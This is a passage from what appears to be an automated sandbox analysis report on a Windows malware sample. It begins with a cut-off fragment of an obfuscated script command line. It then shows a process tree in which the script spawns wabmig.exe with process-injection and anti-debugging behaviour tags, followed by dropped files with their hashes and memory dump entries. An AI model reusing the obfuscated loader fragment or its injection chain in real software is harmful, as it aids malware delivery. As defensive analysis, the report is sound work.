scerVaclsSemi.Gelis Te uTirsb pysSoott,ailrBraniTi.sn Papg Ma (Jara$SparsBratp resiEphyr,eigt Ten,Vort$ H lSPulmk UnaiProcbUbess AfthOli aDis nOv rdLegil PraeUndvrBsteePerenPrers .ip)Synd ');Fanklubbernes $Arcos;"
            4⤵
            • Network Service Discovery
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2612
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Potboiled.Asy && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2136
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3040

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      a04009876fdfd49a6862840833937dd0

      SHA1

      ef0716709a3dd5d5dae9caeec119783674c6e97d

      SHA256

      ba8fefc5ddf6330aa74b70b269147cc0fb4717ab2a3bc425118646ef57b191b9

      SHA512

      fcd4edfb35135b936abf972278b42412b2a52f0d1d78f32390665bffa42bdce8bd0b65fd6805941364a46196fa1fd112d71f59e7d9c1a60289d8197b06398851

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab90AD.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar49BE.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3VFLCHNXR0YOQ54SR7O.temp
      Filesize

      7KB

      MD5

      fe9f4f99422de60d005c35ca38039d81

      SHA1

      ee7da4ad1261e9a1c87de9ca95934e97229ddc54

      SHA256

      aeb010554f830ec85ed95b4acfbc3d3f8d5cd99cf29248705840b0d30f0829c3

      SHA512

      ed646dc4da41c71b4c67d756e7c68c1727b4a9ea0714508d70b5e26aef342c3841e6e5de70277ddfbf02b7d50fdc8dee8c8009aa503843536e689e0e0fd58c05

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Potboiled.Asy
      Filesize

      463KB

      MD5

      e9bb4d5b8741d25cee213e93e940dcdb

      SHA1

      88ed84dcb96f4213925e3f82a1f6266b87d577d6

      SHA256

      f27849467e5652ec2c195e913dd90e717f505b87100d2dd68a145f68e1c42fc9

      SHA512

      31adfb96a8171b8cdf201da024eb380ddcf2d310f2e5d8f41588a4e73a66401c91986f4d8a3c39fe6b460f0f889337cfcbc7b54b15b609180fdcde7925602acb

      Download Submit

    • memory/2332-30-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2332-22-0x00000000023C0000-0x00000000023C8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2332-26-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2332-27-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2332-29-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2332-24-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2332-23-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2332-25-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2332-64-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2332-20-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2332-21-0x000000001B450000-0x000000001B732000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2612-35-0x0000000006700000-0x000000000AB49000-memory.dmp

      Filesize

      68.3MB

      Download

    • memory/3040-38-0x00000000004A0000-0x0000000001502000-memory.dmp

      Filesize

      16.4MB

      Download

    • memory/3040-36-0x0000000001510000-0x0000000005959000-memory.dmp

      Filesize

      68.3MB

      Download

    • memory/3040-63-0x00000000004A0000-0x0000000001502000-memory.dmp

      Filesize

      16.4MB

      Download

    • memory/3040-65-0x00000000004A0000-0x00000000004E0000-memory.dmp

      Filesize

      256KB

      Download